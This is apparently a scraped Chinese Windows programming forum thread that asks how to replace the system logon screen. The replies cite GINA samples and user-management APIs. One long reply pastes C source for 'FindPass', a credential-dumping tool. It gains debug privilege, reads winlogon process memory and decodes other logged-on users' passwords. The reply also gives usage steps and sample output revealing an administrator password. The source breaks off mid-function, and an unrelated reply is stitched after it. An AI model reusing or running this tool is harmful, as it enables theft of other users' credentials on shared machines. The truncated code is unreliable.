怎样实现在进入操作系统登陆前启动自已的程序,也就是说如果我想做一个自已的登陆系统的界面而不要系统本来的登陆界面该怎样实现,希望能具体点,最好能有代码,谢谢
解决方案 »
- 请问怎样美化任务栏xp,mfc里有处理任务栏的api函数吗?原来的任务栏也就一蓝条,看腻了
- 人机界面
- 求助,我用IViewObject2把网页转换为图片怎么会很虚呢
- directshow中如何实现挑选章节的遍历播放?
- 服务程序中为何全局鼠标钩子失效?(参见代码,分不够再加)
- _T(……)表示什么含义啊
- 请问以msm为后缀的文件是什麽各式的?
- vc.net中如何设置连接一个xx.lib文件
- 小菜鸟求教:如何给一个编辑框添加OnKeyDown()以捕获WM_KEYDOWN事件?
- RTSP和SIP两者有什么区别和联系?
- CTypedPtrArray<CObArray,CLine*>m_LineArray; 这语句应该怎么理解?
- 奇怪的DirectSound的延时
(源码太长欠奉)
Platform SDK\samples\winbase\Security\WinNT\GinaStub
所以你必须知道getusersid,getaccountbyname,adjustaccontpreviliege等
函数的用法,具体可以参考msdn中的例子。2你有MSDN吗?
请参考Net函数族
NetGroupAdd()新增组
NetGroupAddUser()新增组用户
NetUserAdd()新增用户
NetUserSetInfo()可设密码、权限
等等……
自己来吧。
下载地址1:ftp://ftp.frontfree.net/Pub/Books/C&C++/VC/新编Windows API参考大全.rar下载地址1:ftp://ftp.frontfree.net/Pub/Books/C&C++/VC/Windows2000编程技术内幕.rar
可以从指定的WinLogon进程中找到指定用户的密码,该用户必须使用图形登陆(本地登陆、终端服务)。
// Find Password from winlogon in win2000 / winnt4 + < sp6
//
// PasswordReminder.cpp --> FindPass.cpp
// 1. http://www.smidgeonsoft.com/
// 2. shotgun add comment, bingle change a little to find other user in winlogon
// This code is licensed under the terms of the GPL (gnu public license).
//
// Usage: FindPass DomainName UserName PID-of-WinLogon
//
// you can get the three params from pulist output in target system.
///*
因为登陆的域名和用户名是明文存储在winlogon进程里的,而PasswordReminder是限定了查找本进程用户的密码
<167-174: GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400);
>,然后到winlogon进程的空间中查找UserDomain和UserName < 590:// 在WinLogon的内存空间中寻找UserName和DomainName的字符串
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
> ,找到后就查后边的加密口令。 其实只要你自己指定用户名和winlogon进程去查找就行了,只要你是管理员,任何本机用msgina.dll图形登陆的用户口令都可以找到。 1. pulist,找到系统里登陆的域名和用户名,及winlogon进程id
2. 然后给每个winlogon进程id查找指定的用户就行了。example: C:\Documents and Settings\bingle>pulist
Process PID User
Idle 0
System 8
smss.exe 164 NT AUTHORITY\SYSTEM
csrss.exe 192 NT AUTHORITY\SYSTEM
winlogon.exe 188 NT AUTHORITY\SYSTEM
wins.exe 1212 NT AUTHORITY\SYSTEM
Explorer.exe 388 TEST-2KSERVER\Administrator
internat.exe 1828 TEST-2KSERVER\Administrator
conime.exe 1868 TEST-2KSERVER\Administrator
msiexec.exe 1904 NT AUTHORITY\SYSTEM
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM
taskmgr.exe 1752 TEST-2KSERVER\Administrator
csrss.exe 2056 NT AUTHORITY\SYSTEM
winlogon.exe 2416 NT AUTHORITY\SYSTEM
rdpclip.exe 2448 TEST-2KSERVER\clovea
Explorer.exe 2408 TEST-2KSERVER\clovea
internat.exe 1480 TEST-2KSERVER\clovea
cmd.exe 2508 TEST-2KSERVER\Administrator
ntshell.exe 368 TEST-2KSERVER\Administrator
ntshell.exe 1548 TEST-2KSERVER\Administrator
ntshell.exe 1504 TEST-2KSERVER\Administrator
csrss.exe 1088 NT AUTHORITY\SYSTEM
winlogon.exe 1876 NT AUTHORITY\SYSTEM
rdpclip.exe 1680 TEST-2KSERVER\bingle
Explorer.exe 2244 TEST-2KSERVER\bingle
conime.exe 2288 TEST-2KSERVER\bingle
internat.exe 1592 TEST-2KSERVER\bingle
cmd.exe 1692 TEST-2KSERVER\bingle
mdm.exe 2476 TEST-2KSERVER\bingle
taskmgr.exe 752 TEST-2KSERVER\bingle
pulist.exe 2532 TEST-2KSERVER\bingle C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER
administrator 188 To Find Password in the Winlogon process
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder.
The WinLogon process id is 188 (0x000000bc).
To find TEST-2KSERVER\administrator password in process 188 ...
The encoded password is found at 0x008e0800 and has a length of 10.
The logon information is: TEST-2KSERVER/administrator/testserver.
The hash byte is: 0x13. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER
clovea 1876 To Find Password in the Winlogon process
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder.
The WinLogon process id is 1876 (0x00000754).
To find TEST-2KSERVER\clovea password in process 1876 ...
PasswordReminder is unable to find the password in memory. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER
bingle 1876 To Find Password in the Winlogon process
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder.
The WinLogon process id is 1876 (0x00000754).
To find TEST-2KSERVER\bingle password in process 1876 ...
The logon information is: TEST-2KSERVER/bingle.
There is no password. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER
clovea 2416 To Find Password in the Winlogon process
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder.
The WinLogon process id is 2416 (0x00000970).
To find TEST-2KSERVER\clovea password in process 2416 ...
The logon information is: TEST-2KSERVER/clovea.
There is no password. C:\Documents and Settings\bingle> */#include <stdafx.h>
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <stdlib.h> typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING; // Undocumented typedef's
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (void);
void DisplayPasswordWin2K (void); // Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
wchar_t UserName [0x400];
wchar_t UserDomain [0x400]; int __cdecl main( int argc, char* argv[] )
{
printf( "\n\t To Find Password in the Winlogon process\n" );
printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); if ((!IsWinNT ())
&&
(!IsWin2K ()))
{
printf ("Windows NT or Windows 2000 are required.\n");
return (0);
} // Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
// 增加PasswordReminder的权限
// 使得PasswordReminder可以打开并调试Winlogon进程
if (!AddDebugPrivilege ())
{
printf
("Unable to add debug privilege.\n");
return (0);
}
printf ("The debug privilege has been added to PasswordReminder.\n"); // 获得几个未公开API的入口地址
HINSTANCE hNtDll =
LoadLibrary
("NTDLL.DLL");
pfnNtQuerySystemInformation =
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress
(hNtDll,
"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer =
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress
(hNtDll,
"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer =
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress
(hNtDll,
"RtlRunDecodeUnicodeString"); // Locate WinLogon's PID - need debug privilege and admin rights.
// 获得Winlogon进程的PID
// 这里作者使用了几个Native API,其实使用PSAPI一样可以
DWORD WinLogonPID =
argc > 3 ? atoi( argv[3] ) : FindWinLogon () ;
if (WinLogonPID == 0)
{
printf
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");
printf
("PasswordReminder is unable to find the password in memory.\n");
FreeLibrary (hNtDll);
return (0);
} printf("The WinLogon process id is %d (0x%8.8lx).\n",
WinLogonPID, WinLogonPID); // Set values to check memory block against.
// 初始化几个和用户账号相关的变量
memset(UserName, 0, sizeof (UserName));
memset(UserDomain, 0, sizeof (UserDomain));
if( argc > 2 )
{
mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) );
mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) );
}else
{
GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400);
}
printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID ); // Locate the block of memory containing
// the password in WinLogon's memory space.
// 在Winlogon进程中定位包含Password的内存块
BOOL FoundPasswordPage = FALSE;
if (IsWin2K ())
FoundPasswordPage =
LocatePasswordPageWin2K
(WinLogonPID,
&PasswordLength);
else
FoundPasswordPage =
LocatePasswordPageWinNT
(WinLogonPID,
&PasswordLength); if (FoundPasswordPage)
{
if (PasswordLength == 0)
{
printf
("The logon information is: %S/%S.\n",
UserDomain,
UserName);
printf
("There is no password.\n");
}
else
{
printf
("The encoded password is found at 0x%8.8lx and has a length of %d.\n",
RealPasswordP,
PasswordLength);
// Decode the password string.
if (IsWin2K ())
DisplayPasswordWin2K ();
else
DisplayPasswordWinNT ();
}
}
else
printf
("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary
(hNtDll);
return (0);
} // main //
// IsWinNT函数用来判断操作系统是否WINNT
//
BOOL
IsWinNT
(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx
(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
} // IsWinNT
//
// IsWin2K函数用来判断操作系统是否Win2K
//
BOOL
IsWin2K
(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx
(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&&
(OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
} // IsWin2K
//
// AddDebugPrivilege函数用来申请调试Winlogon进程的特权
//
BOOL
AddDebugPrivilege
(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if (OpenProcessToken
(GetCurrentProcess (),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&Token))
if (LookupPrivilegeValue
(NULL,
"SeDebugPrivilege",
&TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return
(AdjustTokenPrivileges
(Token,
FALSE,
&TokenPrivileges,
sizeof (TOKEN_PRIVILEGES),
&PreviousState,
&ReturnLength));
}
return (FALSE);
} // AddDebugPrivilege
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
// FindWinLogon函数用来寻找WinLogon进程
// 由于作者使用的是Native API,因此不需要PSAPI的支持
//
DWORD
FindWinLogon
(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD rc = 0;
DWORD SizeNeeded = 0;
PVOID InfoP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation
(0x10,
InfoP,
INITIAL_ALLOCATION,
&SizeNeeded);
HeapFree
(GetProcessHeap (),
0,
InfoP);
// Now, allocate the proper amount of memory.
InfoP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
SizeNeeded);
DWORD SizeWritten = SizeNeeded;
if (pfnNtQuerySystemInformation
(0x10,
InfoP,
SizeNeeded,
&SizeWritten))
{
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (0);
}
DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if (NumHandles == 0)
{
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) InfoP;
DWORD i;
for (i = 1; i <= NumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID DebugBufferP =
pfnRtlCreateQueryDebugBuffer
(0,
0);
if (pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID,
1,
DebugBufferP) == 0)
{
PPROCESS_INFO_HEADER ProcessInfoHeaderP =
(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
DWORD Count =
ProcessInfoHeaderP->Count;
PPROCESS_INFO ProcessInfoP =
(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));
if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON") != 0)
{
DWORD i;
DWORD dw = (DWORD) ProcessInfoP;
for (i = 0; i < Count; i++)
{
dw += sizeof (PROCESS_INFO);
ProcessInfoP = (PPROCESS_INFO) dw;
if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0)
return (0);
if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0)
rc =
QuerySystemInformationP->PID;
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer
(DebugBufferP);
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (rc);
}
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer
(DebugBufferP);
}
DWORD dw = (DWORD) QuerySystemInformationP;
dw += sizeof (QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw;
}
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (rc);
} // FindWinLogon //
// LocatePasswordPageWinNT函数用来在NT中找到用户密码
//
BOOL
LocatePasswordPageWinNT
(DWORD WinLogonPID,
PDWORD PasswordLength)
{
#define USER_DOMAIN_OFFSET_WINNT 0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
BOOL rc = FALSE;
HANDLE WinLogonHandle =
OpenProcess
(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE,
WinLogonPID);
if (WinLogonHandle == 0)
return (rc);
*PasswordLength = 0;
SYSTEM_INFO SystemInfo;
GetSystemInfo
(&SystemInfo);
DWORD PEB = 0x7ffdf000;
DWORD BytesCopied = 0;
PVOID PEBP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
SystemInfo.dwPageSize);
if (!ReadProcessMemory
(WinLogonHandle,
(PVOID) PEB,
PEBP,
SystemInfo.dwPageSize,
&BytesCopied))
{
CloseHandle
(WinLogonHandle);
return (rc);
}
这样的话因为没有加载Windows的管理程序C:\windows\Explorer.exe,你得在程序里加载,不然Windows可就不能用了